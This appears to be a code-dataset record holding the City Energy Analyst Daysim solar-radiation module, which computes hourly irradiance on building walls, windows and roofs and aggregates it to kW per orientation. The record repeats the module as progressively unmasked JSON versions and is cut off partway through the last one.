radiance_parameters["rad_lw"], radiance_parameters["rad_dj"],
radiance_parameters["rad_ds"], radiance_parameters["rad_dr"],
radiance_parameters["rad_dp"])
print('Executing hourly solar isolation calculation')
daysim_project.execute_gen_dc()
daysim_project.execute_ds_illum()
print('Reading results...')
solar_res = daysim_project.eval_ill()
# check inconsistencies and replace by max value of weather file
print('Fixing inconsistencies, if any')
solar_res = np.clip(solar_res, a_min=0.0, a_max=max_global)
# Check if leap year and remove extra day
if solar_res.shape[1] == HOURS_IN_YEAR + 24:
print('Removing leap day')
leap_day_hours = range(1416, 1440)
solar_res = np.delete(solar_res, leap_day_hours, axis=1)
print("Writing results to disk")
index = 0
for building_name, \
sensors_number_building, \
sensor_code_building, \
sensor_intersection_building in zip(names_zone,
sensors_number_zone,
sensors_code_zone,
sensor_intersection_zone):
# select sensors data
selection_of_results = solar_res[index:index + sensors_number_building]
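        # zero out sensors on surfaces flagged as intersecting neighboring geometry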
selection_of_results[np.array(sensor_intersection_building) == 1] = 0
items_sensor_name_and_result = dict(zip(sensor_code_building, selection_of_results.tolist()))
index = index + sensors_number_building
# create summary and save to disk
write_aggregated_results(building_name, items_sensor_name_and_result, locator, weatherfile)
if write_sensor_data:
write_sensor_results(building_name, items_sensor_name_and_result, locator)
# erase daysim folder to avoid conflicts after every iteration
print('Removing results folder')
daysim_project.cleanup_project()
def write_sensor_results(building_name, items_sensor_name_and_result, locator):
with open(locator.get_radiation_building_sensors(building_name), 'w') as outfile:
json.dump(items_sensor_name_and_result, outfile)
def write_aggregated_results(building_name, items_sensor_name_and_result, locator, weatherfile):
geometry = pd.read_csv(locator.get_radiation_metadata(building_name))
geometry['code'] = geometry['TYPE'] + '_' + geometry['orientation'] + '_kW'
solar_analysis_fields = ['windows_east_kW',
'windows_west_kW',
'windows_south_kW',
'windows_north_kW',
'walls_east_kW',
'walls_west_kW',
'walls_south_kW',
'walls_north_kW',
'roofs_top_kW']
solar_analysis_fields_area = ['windows_east_m2',
'windows_west_m2',
'windows_south_m2',
'windows_north_m2',
'walls_east_m2',
'walls_west_m2',
'walls_south_m2',
'walls_north_m2',
'roofs_top_m2']
dict_not_aggregated = {}
for field, field_area in zip(solar_analysis_fields, solar_analysis_fields_area):
select_sensors = geometry.loc[geometry['code'] == field].set_index('SURFACE')
area_m2 = select_sensors['AREA_m2'].sum()
array_field = np.array([select_sensors.loc[surface, 'AREA_m2'] *
np.array(items_sensor_name_and_result[surface])
for surface in select_sensors.index]).sum(axis=0)
        dict_not_aggregated[field] = array_field / 1000  # W -> kW (equivalently kWh per hourly step)
dict_not_aggregated[field_area] = area_m2
data_aggregated_kW = (pd.DataFrame(dict_not_aggregated)).round(2)
data_aggregated_kW["Date"] = weatherfile["date"]
data_aggregated_kW.set_index('Date', inplace=True)
data_aggregated_kW.to_csv(locator.get_radiation_building(building_name))
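# --- Editor's illustration (hedged; not part of the CEA module above) ---
# A minimal, self-contained sketch of the area-weighted aggregation performed in
# write_aggregated_results: per-sensor irradiance in W/m2 is scaled by the sensor
# area, summed over the surfaces of one orientation group, and converted to kW.
# All names and values below are hypothetical demo data.
if __name__ == '__main__':
    demo_area_m2 = {'srf0': 2.0, 'srf1': 3.0}           # hypothetical sensor areas
    demo_w_per_m2 = {'srf0': np.array([100.0, 200.0]),  # two hourly values per sensor
                     'srf1': np.array([50.0, 150.0])}
    group_kW = sum(demo_area_m2[s] * demo_w_per_m2[s] for s in demo_area_m2) / 1000
    print(group_kW)  # -> [0.35 0.85], hourly kW for this surface group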
|
normal
|
{
"blob_id": "164b0afde225119a8fbd4ccfccbbbc3550aa75fe",
"index": 2634,
"step-1": "<mask token>\n\n\ndef create_sensor_input_file(rad, chunk_n):\n sensor_file_path = os.path.join(rad.data_folder_path, 'points_' + str(\n chunk_n) + '.pts')\n sensor_file = open(sensor_file_path, 'w')\n sensor_pts_data = py2radiance.write_rad.sensor_file(rad.\n sensor_positions, rad.sensor_normals)\n sensor_file.write(sensor_pts_data)\n sensor_file.close()\n rad.sensor_file_path = sensor_file_path\n\n\ndef generate_sensor_surfaces(occface, wall_dim, roof_dim, srf_type,\n orientation, normal, intersection):\n mid_pt = py3dmodel.calculate.face_midpt(occface)\n location_pt = py3dmodel.modify.move_pt(mid_pt, normal, 0.01)\n moved_oface = py3dmodel.fetch.topo2topotype(py3dmodel.modify.move(\n mid_pt, location_pt, occface))\n if srf_type == 'roofs':\n xdim = ydim = roof_dim\n else:\n xdim = ydim = wall_dim\n sensor_surfaces = py3dmodel.construct.grid_face(moved_oface, xdim, ydim)\n sensor_intersection = [intersection for x in sensor_surfaces]\n sensor_dir = [normal for x in sensor_surfaces]\n sensor_cord = [py3dmodel.calculate.face_midpt(x) for x in sensor_surfaces]\n sensor_type = [srf_type for x in sensor_surfaces]\n sensor_orientation = [orientation for x in sensor_surfaces]\n sensor_area = [(calculate.face_area(x) * (1.0 - scalar)) for x, scalar in\n zip(sensor_surfaces, sensor_intersection)]\n return (sensor_dir, sensor_cord, sensor_type, sensor_area,\n sensor_orientation, sensor_intersection)\n\n\n<mask token>\n\n\ndef calc_sensors_zone(building_names, locator, grid_size, geometry_pickle_dir):\n sensors_coords_zone = []\n sensors_dir_zone = []\n sensors_total_number_list = []\n names_zone = []\n sensors_code_zone = []\n sensor_intersection_zone = []\n for building_name in building_names:\n building_geometry = BuildingGeometry.load(os.path.join(\n geometry_pickle_dir, 'zone', building_name))\n (sensors_dir_building, sensors_coords_building,\n sensors_type_building, sensors_area_building,\n sensor_orientation_building, sensor_intersection_building\n ) = calc_sensors_building(building_geometry, grid_size)\n sensors_number = len(sensors_coords_building)\n sensors_total_number_list.append(sensors_number)\n sensors_code = [('srf' + str(x)) for x in range(sensors_number)]\n sensors_code_zone.append(sensors_code)\n sensors_coords_zone.extend(sensors_coords_building)\n sensors_dir_zone.extend(sensors_dir_building)\n sensor_intersection_zone.append(sensor_intersection_building)\n names_zone.append(building_name)\n pd.DataFrame({'BUILDING': building_name, 'SURFACE': sensors_code,\n 'orientation': sensor_orientation_building, 'intersection':\n sensor_intersection_building, 'Xcoor': [x[0] for x in\n sensors_coords_building], 'Ycoor': [x[1] for x in\n sensors_coords_building], 'Zcoor': [x[2] for x in\n sensors_coords_building], 'Xdir': [x[0] for x in\n sensors_dir_building], 'Ydir': [x[1] for x in\n sensors_dir_building], 'Zdir': [x[2] for x in\n sensors_dir_building], 'AREA_m2': sensors_area_building, 'TYPE':\n sensors_type_building}).to_csv(locator.get_radiation_metadata(\n building_name), index=None)\n return (sensors_coords_zone, sensors_dir_zone,\n sensors_total_number_list, names_zone, sensors_code_zone,\n sensor_intersection_zone)\n\n\ndef isolation_daysim(chunk_n, cea_daysim, building_names, locator,\n radiance_parameters, write_sensor_data, grid_size, max_global,\n weatherfile, geometry_pickle_dir):\n daysim_project = cea_daysim.initialize_daysim_project('chunk_{n}'.\n format(n=chunk_n))\n print('Creating daysim project in: {daysim_dir}'.format(daysim_dir=\n 
daysim_project.project_path))\n print('Calculating and sending sensor points')\n (sensors_coords_zone, sensors_dir_zone, sensors_number_zone, names_zone,\n sensors_code_zone, sensor_intersection_zone) = (calc_sensors_zone(\n building_names, locator, grid_size, geometry_pickle_dir))\n num_sensors = sum(sensors_number_zone)\n daysim_project.create_sensor_input_file(sensors_coords_zone,\n sensors_dir_zone, num_sensors, 'w/m2')\n print('Starting Daysim simulation for buildings: {buildings}'.format(\n buildings=names_zone))\n print('Total number of sensors: {num_sensors}'.format(num_sensors=\n num_sensors))\n print('Writing radiance parameters')\n daysim_project.write_radiance_parameters(radiance_parameters['rad_ab'],\n radiance_parameters['rad_ad'], radiance_parameters['rad_as'],\n radiance_parameters['rad_ar'], radiance_parameters['rad_aa'],\n radiance_parameters['rad_lr'], radiance_parameters['rad_st'],\n radiance_parameters['rad_sj'], radiance_parameters['rad_lw'],\n radiance_parameters['rad_dj'], radiance_parameters['rad_ds'],\n radiance_parameters['rad_dr'], radiance_parameters['rad_dp'])\n print('Executing hourly solar isolation calculation')\n daysim_project.execute_gen_dc()\n daysim_project.execute_ds_illum()\n print('Reading results...')\n solar_res = daysim_project.eval_ill()\n print('Fixing inconsistencies, if any')\n solar_res = np.clip(solar_res, a_min=0.0, a_max=max_global)\n if solar_res.shape[1] == HOURS_IN_YEAR + 24:\n print('Removing leap day')\n leap_day_hours = range(1416, 1440)\n solar_res = np.delete(solar_res, leap_day_hours, axis=1)\n print('Writing results to disk')\n index = 0\n for building_name, sensors_number_building, sensor_code_building, sensor_intersection_building in zip(\n names_zone, sensors_number_zone, sensors_code_zone,\n sensor_intersection_zone):\n selection_of_results = solar_res[index:index + sensors_number_building]\n selection_of_results[np.array(sensor_intersection_building) == 1] = 0\n items_sensor_name_and_result = dict(zip(sensor_code_building,\n selection_of_results.tolist()))\n index = index + sensors_number_building\n write_aggregated_results(building_name,\n items_sensor_name_and_result, locator, weatherfile)\n if write_sensor_data:\n write_sensor_results(building_name,\n items_sensor_name_and_result, locator)\n print('Removing results folder')\n daysim_project.cleanup_project()\n\n\ndef write_sensor_results(building_name, items_sensor_name_and_result, locator):\n with open(locator.get_radiation_building_sensors(building_name), 'w'\n ) as outfile:\n json.dump(items_sensor_name_and_result, outfile)\n\n\ndef write_aggregated_results(building_name, items_sensor_name_and_result,\n locator, weatherfile):\n geometry = pd.read_csv(locator.get_radiation_metadata(building_name))\n geometry['code'] = geometry['TYPE'] + '_' + geometry['orientation'] + '_kW'\n solar_analysis_fields = ['windows_east_kW', 'windows_west_kW',\n 'windows_south_kW', 'windows_north_kW', 'walls_east_kW',\n 'walls_west_kW', 'walls_south_kW', 'walls_north_kW', 'roofs_top_kW']\n solar_analysis_fields_area = ['windows_east_m2', 'windows_west_m2',\n 'windows_south_m2', 'windows_north_m2', 'walls_east_m2',\n 'walls_west_m2', 'walls_south_m2', 'walls_north_m2', 'roofs_top_m2']\n dict_not_aggregated = {}\n for field, field_area in zip(solar_analysis_fields,\n solar_analysis_fields_area):\n select_sensors = geometry.loc[geometry['code'] == field].set_index(\n 'SURFACE')\n area_m2 = select_sensors['AREA_m2'].sum()\n array_field = np.array([(select_sensors.loc[surface, 'AREA_m2'] *\n 
np.array(items_sensor_name_and_result[surface])) for surface in\n select_sensors.index]).sum(axis=0)\n dict_not_aggregated[field] = array_field / 1000\n dict_not_aggregated[field_area] = area_m2\n data_aggregated_kW = pd.DataFrame(dict_not_aggregated).round(2)\n data_aggregated_kW['Date'] = weatherfile['date']\n data_aggregated_kW.set_index('Date', inplace=True)\n data_aggregated_kW.to_csv(locator.get_radiation_building(building_name))\n",
"step-2": "<mask token>\n\n\ndef create_sensor_input_file(rad, chunk_n):\n sensor_file_path = os.path.join(rad.data_folder_path, 'points_' + str(\n chunk_n) + '.pts')\n sensor_file = open(sensor_file_path, 'w')\n sensor_pts_data = py2radiance.write_rad.sensor_file(rad.\n sensor_positions, rad.sensor_normals)\n sensor_file.write(sensor_pts_data)\n sensor_file.close()\n rad.sensor_file_path = sensor_file_path\n\n\ndef generate_sensor_surfaces(occface, wall_dim, roof_dim, srf_type,\n orientation, normal, intersection):\n mid_pt = py3dmodel.calculate.face_midpt(occface)\n location_pt = py3dmodel.modify.move_pt(mid_pt, normal, 0.01)\n moved_oface = py3dmodel.fetch.topo2topotype(py3dmodel.modify.move(\n mid_pt, location_pt, occface))\n if srf_type == 'roofs':\n xdim = ydim = roof_dim\n else:\n xdim = ydim = wall_dim\n sensor_surfaces = py3dmodel.construct.grid_face(moved_oface, xdim, ydim)\n sensor_intersection = [intersection for x in sensor_surfaces]\n sensor_dir = [normal for x in sensor_surfaces]\n sensor_cord = [py3dmodel.calculate.face_midpt(x) for x in sensor_surfaces]\n sensor_type = [srf_type for x in sensor_surfaces]\n sensor_orientation = [orientation for x in sensor_surfaces]\n sensor_area = [(calculate.face_area(x) * (1.0 - scalar)) for x, scalar in\n zip(sensor_surfaces, sensor_intersection)]\n return (sensor_dir, sensor_cord, sensor_type, sensor_area,\n sensor_orientation, sensor_intersection)\n\n\ndef calc_sensors_building(building_geometry, grid_size):\n sensor_dir_list = []\n sensor_cord_list = []\n sensor_type_list = []\n sensor_area_list = []\n sensor_orientation_list = []\n sensor_intersection_list = []\n surfaces_types = ['walls', 'windows', 'roofs']\n sensor_vertical_grid_dim = grid_size['walls_grid']\n sensor_horizontal_grid_dim = grid_size['roof_grid']\n for srf_type in surfaces_types:\n occface_list = getattr(building_geometry, srf_type)\n if srf_type == 'roofs':\n orientation_list = ['top'] * len(occface_list)\n normals_list = [(0.0, 0.0, 1.0)] * len(occface_list)\n interesection_list = [0] * len(occface_list)\n elif srf_type == 'windows':\n orientation_list = getattr(building_geometry,\n 'orientation_{srf_type}'.format(srf_type=srf_type))\n normals_list = getattr(building_geometry, 'normals_{srf_type}'.\n format(srf_type=srf_type))\n interesection_list = [0] * len(occface_list)\n else:\n orientation_list = getattr(building_geometry,\n 'orientation_{srf_type}'.format(srf_type=srf_type))\n normals_list = getattr(building_geometry, 'normals_{srf_type}'.\n format(srf_type=srf_type))\n interesection_list = getattr(building_geometry,\n 'intersect_{srf_type}'.format(srf_type=srf_type))\n for orientation, normal, face, intersection in zip(orientation_list,\n normals_list, occface_list, interesection_list):\n (sensor_dir, sensor_cord, sensor_type, sensor_area,\n sensor_orientation, sensor_intersection) = (\n generate_sensor_surfaces(face, sensor_vertical_grid_dim,\n sensor_horizontal_grid_dim, srf_type, orientation, normal,\n intersection))\n sensor_intersection_list.extend(sensor_intersection)\n sensor_dir_list.extend(sensor_dir)\n sensor_cord_list.extend(sensor_cord)\n sensor_type_list.extend(sensor_type)\n sensor_area_list.extend(sensor_area)\n sensor_orientation_list.extend(sensor_orientation)\n return (sensor_dir_list, sensor_cord_list, sensor_type_list,\n sensor_area_list, sensor_orientation_list, sensor_intersection_list)\n\n\ndef calc_sensors_zone(building_names, locator, grid_size, geometry_pickle_dir):\n sensors_coords_zone = []\n sensors_dir_zone = []\n 
sensors_total_number_list = []\n names_zone = []\n sensors_code_zone = []\n sensor_intersection_zone = []\n for building_name in building_names:\n building_geometry = BuildingGeometry.load(os.path.join(\n geometry_pickle_dir, 'zone', building_name))\n (sensors_dir_building, sensors_coords_building,\n sensors_type_building, sensors_area_building,\n sensor_orientation_building, sensor_intersection_building\n ) = calc_sensors_building(building_geometry, grid_size)\n sensors_number = len(sensors_coords_building)\n sensors_total_number_list.append(sensors_number)\n sensors_code = [('srf' + str(x)) for x in range(sensors_number)]\n sensors_code_zone.append(sensors_code)\n sensors_coords_zone.extend(sensors_coords_building)\n sensors_dir_zone.extend(sensors_dir_building)\n sensor_intersection_zone.append(sensor_intersection_building)\n names_zone.append(building_name)\n pd.DataFrame({'BUILDING': building_name, 'SURFACE': sensors_code,\n 'orientation': sensor_orientation_building, 'intersection':\n sensor_intersection_building, 'Xcoor': [x[0] for x in\n sensors_coords_building], 'Ycoor': [x[1] for x in\n sensors_coords_building], 'Zcoor': [x[2] for x in\n sensors_coords_building], 'Xdir': [x[0] for x in\n sensors_dir_building], 'Ydir': [x[1] for x in\n sensors_dir_building], 'Zdir': [x[2] for x in\n sensors_dir_building], 'AREA_m2': sensors_area_building, 'TYPE':\n sensors_type_building}).to_csv(locator.get_radiation_metadata(\n building_name), index=None)\n return (sensors_coords_zone, sensors_dir_zone,\n sensors_total_number_list, names_zone, sensors_code_zone,\n sensor_intersection_zone)\n\n\ndef isolation_daysim(chunk_n, cea_daysim, building_names, locator,\n radiance_parameters, write_sensor_data, grid_size, max_global,\n weatherfile, geometry_pickle_dir):\n daysim_project = cea_daysim.initialize_daysim_project('chunk_{n}'.\n format(n=chunk_n))\n print('Creating daysim project in: {daysim_dir}'.format(daysim_dir=\n daysim_project.project_path))\n print('Calculating and sending sensor points')\n (sensors_coords_zone, sensors_dir_zone, sensors_number_zone, names_zone,\n sensors_code_zone, sensor_intersection_zone) = (calc_sensors_zone(\n building_names, locator, grid_size, geometry_pickle_dir))\n num_sensors = sum(sensors_number_zone)\n daysim_project.create_sensor_input_file(sensors_coords_zone,\n sensors_dir_zone, num_sensors, 'w/m2')\n print('Starting Daysim simulation for buildings: {buildings}'.format(\n buildings=names_zone))\n print('Total number of sensors: {num_sensors}'.format(num_sensors=\n num_sensors))\n print('Writing radiance parameters')\n daysim_project.write_radiance_parameters(radiance_parameters['rad_ab'],\n radiance_parameters['rad_ad'], radiance_parameters['rad_as'],\n radiance_parameters['rad_ar'], radiance_parameters['rad_aa'],\n radiance_parameters['rad_lr'], radiance_parameters['rad_st'],\n radiance_parameters['rad_sj'], radiance_parameters['rad_lw'],\n radiance_parameters['rad_dj'], radiance_parameters['rad_ds'],\n radiance_parameters['rad_dr'], radiance_parameters['rad_dp'])\n print('Executing hourly solar isolation calculation')\n daysim_project.execute_gen_dc()\n daysim_project.execute_ds_illum()\n print('Reading results...')\n solar_res = daysim_project.eval_ill()\n print('Fixing inconsistencies, if any')\n solar_res = np.clip(solar_res, a_min=0.0, a_max=max_global)\n if solar_res.shape[1] == HOURS_IN_YEAR + 24:\n print('Removing leap day')\n leap_day_hours = range(1416, 1440)\n solar_res = np.delete(solar_res, leap_day_hours, axis=1)\n print('Writing results to 
disk')\n index = 0\n for building_name, sensors_number_building, sensor_code_building, sensor_intersection_building in zip(\n names_zone, sensors_number_zone, sensors_code_zone,\n sensor_intersection_zone):\n selection_of_results = solar_res[index:index + sensors_number_building]\n selection_of_results[np.array(sensor_intersection_building) == 1] = 0\n items_sensor_name_and_result = dict(zip(sensor_code_building,\n selection_of_results.tolist()))\n index = index + sensors_number_building\n write_aggregated_results(building_name,\n items_sensor_name_and_result, locator, weatherfile)\n if write_sensor_data:\n write_sensor_results(building_name,\n items_sensor_name_and_result, locator)\n print('Removing results folder')\n daysim_project.cleanup_project()\n\n\ndef write_sensor_results(building_name, items_sensor_name_and_result, locator):\n with open(locator.get_radiation_building_sensors(building_name), 'w'\n ) as outfile:\n json.dump(items_sensor_name_and_result, outfile)\n\n\ndef write_aggregated_results(building_name, items_sensor_name_and_result,\n locator, weatherfile):\n geometry = pd.read_csv(locator.get_radiation_metadata(building_name))\n geometry['code'] = geometry['TYPE'] + '_' + geometry['orientation'] + '_kW'\n solar_analysis_fields = ['windows_east_kW', 'windows_west_kW',\n 'windows_south_kW', 'windows_north_kW', 'walls_east_kW',\n 'walls_west_kW', 'walls_south_kW', 'walls_north_kW', 'roofs_top_kW']\n solar_analysis_fields_area = ['windows_east_m2', 'windows_west_m2',\n 'windows_south_m2', 'windows_north_m2', 'walls_east_m2',\n 'walls_west_m2', 'walls_south_m2', 'walls_north_m2', 'roofs_top_m2']\n dict_not_aggregated = {}\n for field, field_area in zip(solar_analysis_fields,\n solar_analysis_fields_area):\n select_sensors = geometry.loc[geometry['code'] == field].set_index(\n 'SURFACE')\n area_m2 = select_sensors['AREA_m2'].sum()\n array_field = np.array([(select_sensors.loc[surface, 'AREA_m2'] *\n np.array(items_sensor_name_and_result[surface])) for surface in\n select_sensors.index]).sum(axis=0)\n dict_not_aggregated[field] = array_field / 1000\n dict_not_aggregated[field_area] = area_m2\n data_aggregated_kW = pd.DataFrame(dict_not_aggregated).round(2)\n data_aggregated_kW['Date'] = weatherfile['date']\n data_aggregated_kW.set_index('Date', inplace=True)\n data_aggregated_kW.to_csv(locator.get_radiation_building(building_name))\n",
"step-3": "<mask token>\n__author__ = 'Jimeno A. Fonseca'\n__copyright__ = (\n 'Copyright 2017, Architecture and Building Systems - ETH Zurich')\n__credits__ = ['Jimeno A. Fonseca', 'Kian Wee Chen']\n__license__ = 'MIT'\n__version__ = '0.1'\n__maintainer__ = 'Daren Thomas'\n__email__ = '[email protected]'\n__status__ = 'Production'\n<mask token>\nsuppress_3rd_party_debug_loggers()\n\n\ndef create_sensor_input_file(rad, chunk_n):\n sensor_file_path = os.path.join(rad.data_folder_path, 'points_' + str(\n chunk_n) + '.pts')\n sensor_file = open(sensor_file_path, 'w')\n sensor_pts_data = py2radiance.write_rad.sensor_file(rad.\n sensor_positions, rad.sensor_normals)\n sensor_file.write(sensor_pts_data)\n sensor_file.close()\n rad.sensor_file_path = sensor_file_path\n\n\ndef generate_sensor_surfaces(occface, wall_dim, roof_dim, srf_type,\n orientation, normal, intersection):\n mid_pt = py3dmodel.calculate.face_midpt(occface)\n location_pt = py3dmodel.modify.move_pt(mid_pt, normal, 0.01)\n moved_oface = py3dmodel.fetch.topo2topotype(py3dmodel.modify.move(\n mid_pt, location_pt, occface))\n if srf_type == 'roofs':\n xdim = ydim = roof_dim\n else:\n xdim = ydim = wall_dim\n sensor_surfaces = py3dmodel.construct.grid_face(moved_oface, xdim, ydim)\n sensor_intersection = [intersection for x in sensor_surfaces]\n sensor_dir = [normal for x in sensor_surfaces]\n sensor_cord = [py3dmodel.calculate.face_midpt(x) for x in sensor_surfaces]\n sensor_type = [srf_type for x in sensor_surfaces]\n sensor_orientation = [orientation for x in sensor_surfaces]\n sensor_area = [(calculate.face_area(x) * (1.0 - scalar)) for x, scalar in\n zip(sensor_surfaces, sensor_intersection)]\n return (sensor_dir, sensor_cord, sensor_type, sensor_area,\n sensor_orientation, sensor_intersection)\n\n\ndef calc_sensors_building(building_geometry, grid_size):\n sensor_dir_list = []\n sensor_cord_list = []\n sensor_type_list = []\n sensor_area_list = []\n sensor_orientation_list = []\n sensor_intersection_list = []\n surfaces_types = ['walls', 'windows', 'roofs']\n sensor_vertical_grid_dim = grid_size['walls_grid']\n sensor_horizontal_grid_dim = grid_size['roof_grid']\n for srf_type in surfaces_types:\n occface_list = getattr(building_geometry, srf_type)\n if srf_type == 'roofs':\n orientation_list = ['top'] * len(occface_list)\n normals_list = [(0.0, 0.0, 1.0)] * len(occface_list)\n interesection_list = [0] * len(occface_list)\n elif srf_type == 'windows':\n orientation_list = getattr(building_geometry,\n 'orientation_{srf_type}'.format(srf_type=srf_type))\n normals_list = getattr(building_geometry, 'normals_{srf_type}'.\n format(srf_type=srf_type))\n interesection_list = [0] * len(occface_list)\n else:\n orientation_list = getattr(building_geometry,\n 'orientation_{srf_type}'.format(srf_type=srf_type))\n normals_list = getattr(building_geometry, 'normals_{srf_type}'.\n format(srf_type=srf_type))\n interesection_list = getattr(building_geometry,\n 'intersect_{srf_type}'.format(srf_type=srf_type))\n for orientation, normal, face, intersection in zip(orientation_list,\n normals_list, occface_list, interesection_list):\n (sensor_dir, sensor_cord, sensor_type, sensor_area,\n sensor_orientation, sensor_intersection) = (\n generate_sensor_surfaces(face, sensor_vertical_grid_dim,\n sensor_horizontal_grid_dim, srf_type, orientation, normal,\n intersection))\n sensor_intersection_list.extend(sensor_intersection)\n sensor_dir_list.extend(sensor_dir)\n sensor_cord_list.extend(sensor_cord)\n sensor_type_list.extend(sensor_type)\n 
sensor_area_list.extend(sensor_area)\n sensor_orientation_list.extend(sensor_orientation)\n return (sensor_dir_list, sensor_cord_list, sensor_type_list,\n sensor_area_list, sensor_orientation_list, sensor_intersection_list)\n\n\ndef calc_sensors_zone(building_names, locator, grid_size, geometry_pickle_dir):\n sensors_coords_zone = []\n sensors_dir_zone = []\n sensors_total_number_list = []\n names_zone = []\n sensors_code_zone = []\n sensor_intersection_zone = []\n for building_name in building_names:\n building_geometry = BuildingGeometry.load(os.path.join(\n geometry_pickle_dir, 'zone', building_name))\n (sensors_dir_building, sensors_coords_building,\n sensors_type_building, sensors_area_building,\n sensor_orientation_building, sensor_intersection_building\n ) = calc_sensors_building(building_geometry, grid_size)\n sensors_number = len(sensors_coords_building)\n sensors_total_number_list.append(sensors_number)\n sensors_code = [('srf' + str(x)) for x in range(sensors_number)]\n sensors_code_zone.append(sensors_code)\n sensors_coords_zone.extend(sensors_coords_building)\n sensors_dir_zone.extend(sensors_dir_building)\n sensor_intersection_zone.append(sensor_intersection_building)\n names_zone.append(building_name)\n pd.DataFrame({'BUILDING': building_name, 'SURFACE': sensors_code,\n 'orientation': sensor_orientation_building, 'intersection':\n sensor_intersection_building, 'Xcoor': [x[0] for x in\n sensors_coords_building], 'Ycoor': [x[1] for x in\n sensors_coords_building], 'Zcoor': [x[2] for x in\n sensors_coords_building], 'Xdir': [x[0] for x in\n sensors_dir_building], 'Ydir': [x[1] for x in\n sensors_dir_building], 'Zdir': [x[2] for x in\n sensors_dir_building], 'AREA_m2': sensors_area_building, 'TYPE':\n sensors_type_building}).to_csv(locator.get_radiation_metadata(\n building_name), index=None)\n return (sensors_coords_zone, sensors_dir_zone,\n sensors_total_number_list, names_zone, sensors_code_zone,\n sensor_intersection_zone)\n\n\ndef isolation_daysim(chunk_n, cea_daysim, building_names, locator,\n radiance_parameters, write_sensor_data, grid_size, max_global,\n weatherfile, geometry_pickle_dir):\n daysim_project = cea_daysim.initialize_daysim_project('chunk_{n}'.\n format(n=chunk_n))\n print('Creating daysim project in: {daysim_dir}'.format(daysim_dir=\n daysim_project.project_path))\n print('Calculating and sending sensor points')\n (sensors_coords_zone, sensors_dir_zone, sensors_number_zone, names_zone,\n sensors_code_zone, sensor_intersection_zone) = (calc_sensors_zone(\n building_names, locator, grid_size, geometry_pickle_dir))\n num_sensors = sum(sensors_number_zone)\n daysim_project.create_sensor_input_file(sensors_coords_zone,\n sensors_dir_zone, num_sensors, 'w/m2')\n print('Starting Daysim simulation for buildings: {buildings}'.format(\n buildings=names_zone))\n print('Total number of sensors: {num_sensors}'.format(num_sensors=\n num_sensors))\n print('Writing radiance parameters')\n daysim_project.write_radiance_parameters(radiance_parameters['rad_ab'],\n radiance_parameters['rad_ad'], radiance_parameters['rad_as'],\n radiance_parameters['rad_ar'], radiance_parameters['rad_aa'],\n radiance_parameters['rad_lr'], radiance_parameters['rad_st'],\n radiance_parameters['rad_sj'], radiance_parameters['rad_lw'],\n radiance_parameters['rad_dj'], radiance_parameters['rad_ds'],\n radiance_parameters['rad_dr'], radiance_parameters['rad_dp'])\n print('Executing hourly solar isolation calculation')\n daysim_project.execute_gen_dc()\n daysim_project.execute_ds_illum()\n 
print('Reading results...')\n solar_res = daysim_project.eval_ill()\n print('Fixing inconsistencies, if any')\n solar_res = np.clip(solar_res, a_min=0.0, a_max=max_global)\n if solar_res.shape[1] == HOURS_IN_YEAR + 24:\n print('Removing leap day')\n leap_day_hours = range(1416, 1440)\n solar_res = np.delete(solar_res, leap_day_hours, axis=1)\n print('Writing results to disk')\n index = 0\n for building_name, sensors_number_building, sensor_code_building, sensor_intersection_building in zip(\n names_zone, sensors_number_zone, sensors_code_zone,\n sensor_intersection_zone):\n selection_of_results = solar_res[index:index + sensors_number_building]\n selection_of_results[np.array(sensor_intersection_building) == 1] = 0\n items_sensor_name_and_result = dict(zip(sensor_code_building,\n selection_of_results.tolist()))\n index = index + sensors_number_building\n write_aggregated_results(building_name,\n items_sensor_name_and_result, locator, weatherfile)\n if write_sensor_data:\n write_sensor_results(building_name,\n items_sensor_name_and_result, locator)\n print('Removing results folder')\n daysim_project.cleanup_project()\n\n\ndef write_sensor_results(building_name, items_sensor_name_and_result, locator):\n with open(locator.get_radiation_building_sensors(building_name), 'w'\n ) as outfile:\n json.dump(items_sensor_name_and_result, outfile)\n\n\ndef write_aggregated_results(building_name, items_sensor_name_and_result,\n locator, weatherfile):\n geometry = pd.read_csv(locator.get_radiation_metadata(building_name))\n geometry['code'] = geometry['TYPE'] + '_' + geometry['orientation'] + '_kW'\n solar_analysis_fields = ['windows_east_kW', 'windows_west_kW',\n 'windows_south_kW', 'windows_north_kW', 'walls_east_kW',\n 'walls_west_kW', 'walls_south_kW', 'walls_north_kW', 'roofs_top_kW']\n solar_analysis_fields_area = ['windows_east_m2', 'windows_west_m2',\n 'windows_south_m2', 'windows_north_m2', 'walls_east_m2',\n 'walls_west_m2', 'walls_south_m2', 'walls_north_m2', 'roofs_top_m2']\n dict_not_aggregated = {}\n for field, field_area in zip(solar_analysis_fields,\n solar_analysis_fields_area):\n select_sensors = geometry.loc[geometry['code'] == field].set_index(\n 'SURFACE')\n area_m2 = select_sensors['AREA_m2'].sum()\n array_field = np.array([(select_sensors.loc[surface, 'AREA_m2'] *\n np.array(items_sensor_name_and_result[surface])) for surface in\n select_sensors.index]).sum(axis=0)\n dict_not_aggregated[field] = array_field / 1000\n dict_not_aggregated[field_area] = area_m2\n data_aggregated_kW = pd.DataFrame(dict_not_aggregated).round(2)\n data_aggregated_kW['Date'] = weatherfile['date']\n data_aggregated_kW.set_index('Date', inplace=True)\n data_aggregated_kW.to_csv(locator.get_radiation_building(building_name))\n",
"step-4": "import json\nimport os\nimport numpy as np\nimport pandas as pd\nimport py4design.py2radiance as py2radiance\nimport py4design.py3dmodel.calculate as calculate\nfrom py4design import py3dmodel\n__author__ = 'Jimeno A. Fonseca'\n__copyright__ = (\n 'Copyright 2017, Architecture and Building Systems - ETH Zurich')\n__credits__ = ['Jimeno A. Fonseca', 'Kian Wee Chen']\n__license__ = 'MIT'\n__version__ = '0.1'\n__maintainer__ = 'Daren Thomas'\n__email__ = '[email protected]'\n__status__ = 'Production'\nfrom cea.constants import HOURS_IN_YEAR\nfrom cea.resources.radiation_daysim.geometry_generator import BuildingGeometry\nfrom cea import suppress_3rd_party_debug_loggers\nsuppress_3rd_party_debug_loggers()\n\n\ndef create_sensor_input_file(rad, chunk_n):\n sensor_file_path = os.path.join(rad.data_folder_path, 'points_' + str(\n chunk_n) + '.pts')\n sensor_file = open(sensor_file_path, 'w')\n sensor_pts_data = py2radiance.write_rad.sensor_file(rad.\n sensor_positions, rad.sensor_normals)\n sensor_file.write(sensor_pts_data)\n sensor_file.close()\n rad.sensor_file_path = sensor_file_path\n\n\ndef generate_sensor_surfaces(occface, wall_dim, roof_dim, srf_type,\n orientation, normal, intersection):\n mid_pt = py3dmodel.calculate.face_midpt(occface)\n location_pt = 